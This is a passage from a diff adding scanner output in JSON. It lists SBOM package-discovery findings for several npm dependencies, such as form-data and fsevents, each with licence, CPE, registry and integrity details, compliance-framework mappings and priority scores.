"control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f31639275e9af4b4", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: form-data 2.5.5", + "title": "form-data 2.5.5", + "description": "Package discovered: form-data 2.5.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "cccf1222c38fa883", + "name": "form-data", + "version": "2.5.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:form-data:form-data:2.5.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:form-data:form_data:2.5.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:form_data:form-data:2.5.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:form_data:form_data:2.5.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:form:form-data:2.5.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:form:form_data:2.5.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/form-data@2.5.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.5.tgz", + "integrity": "sha512-jqdObeR2rxZZbPSGL+3VckHMYtu+f9//KXBsVny6JSX/pa38Fy+bGjuG8eW/H6USNQWhLi8Num++cU2yOCNz4A==", + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", + "mime-types": "^2.1.35", + "safe-buffer": "^5.2.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f04370c9bd4302d0", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: form-data 4.0.5", + "title": "form-data 4.0.5", + "description": "Package discovered: form-data 4.0.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "fb8802f2379acb63", + "name": "form-data", + "version": "4.0.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:form-data:form-data:4.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:form-data:form_data:4.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:form_data:form-data:4.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:form_data:form_data:4.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:form:form-data:4.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:form:form_data:4.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/form-data@4.0.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.5.tgz", + "integrity": "sha512-8RipRLol37bNs2bhoV67fiTEvdTrbMUYcFTiy3+wuuOnUog2QBHCZWXDRijWQfAkhBj2Uf5UnVaiWwA5vdd82w==", + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", + "mime-types": "^2.1.12" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "309869a00f00319d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: forwarded 0.2.0", + "title": "forwarded 0.2.0", + "description": "Package discovered: forwarded 0.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e972502f7a8ea944", + "name": "forwarded", + "version": "0.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:forwarded_project:forwarded:0.2.0:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/forwarded@0.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/forwarded/-/forwarded-0.2.0.tgz", + "integrity": "sha512-buRG0fpBtRHSTCOASe6hD258tEubFoRLb4ZNA6NxMVHNw2gOcwHo9wyablzMzOA5z9xA9L1KNjk/Nt6MT9aYow==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f433c70fa1fc6314", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: fraction.js 5.3.4", + "title": "fraction.js 5.3.4", + "description": "Package discovered: fraction.js 5.3.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f45608cb782e3ae1", + "name": "fraction.js", + "version": "5.3.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:fraction.js:fraction.js:5.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/fraction.js@5.3.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/fraction.js/-/fraction.js-5.3.4.tgz", + "integrity": "sha512-1X1NTtiJphryn/uLQz3whtY6jK3fTqoE3ohKs0tT+Ujr1W59oopxmoEh7Lu5p6vBaPbgoM0bzveAW4Qi5RyWDQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9a535c2456d85e31", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: fresh 0.5.2", + "title": "fresh 0.5.2", + "description": "Package discovered: fresh 0.5.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7908a3419570e85d", + "name": "fresh", + "version": "0.5.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:fresh_project:fresh:0.5.2:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/fresh@0.5.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/fresh/-/fresh-0.5.2.tgz", + "integrity": "sha512-zJ2mQYM18rEFOudeV4GShTGIQ7RbzA7ozbU9I/XBpm7kqgMywgmylMwXHxZJmkVoYkna9d2pVXVXPdYTP9ej8Q==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2b4f03d780920bbf", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: fsevents 2.3.3", + "title": "fsevents 2.3.3", + "description": "Package discovered: fsevents 2.3.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "585a401b2834ec08", + "name": "fsevents", + "version": "2.3.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:fsevents:fsevents:2.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/fsevents@2.3.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", + "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ed6c41b4eae5b77e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: function-bind 1.1.2", + "title": "function-bind 1.1.2", + "description": "Package discovered: function-bind 1.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a9db1e71931f56ac", + "name": "function-bind", + "version": "1.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:function-bind:function-bind:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:function-bind:function_bind:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:function_bind:function-bind:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:function_bind:function_bind:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:function:function-bind:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:function:function_bind:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/function-bind@1.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1567b7d3e95e72e5", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: functional-red-black-tree 1.0.1", + "title": "functional-red-black-tree 1.0.1", + "description": "Package discovered: functional-red-black-tree 1.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "06c01b9cd08a3446", + "name": "functional-red-black-tree", + "version": "1.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:functional-red-black-tree:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:functional-red-black-tree:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:functional_red_black_tree:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:functional_red_black_tree:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:functional-red-black:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:functional-red-black:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:functional_red_black:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:functional_red_black:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:functional-red:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:functional-red:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:functional_red:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:functional_red:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:functional:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:functional:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/functional-red-black-tree@1.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/functional-red-black-tree/-/functional-red-black-tree-1.0.1.tgz", + "integrity": "sha512-dsKNQNdj6xA3T+QlADDA7mOSlX0qiMINjn0cgr+eGHGsbSHzTabcIogz2+p/iqP1Xs6EP/sS2SbqH+brGTbq0g==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + 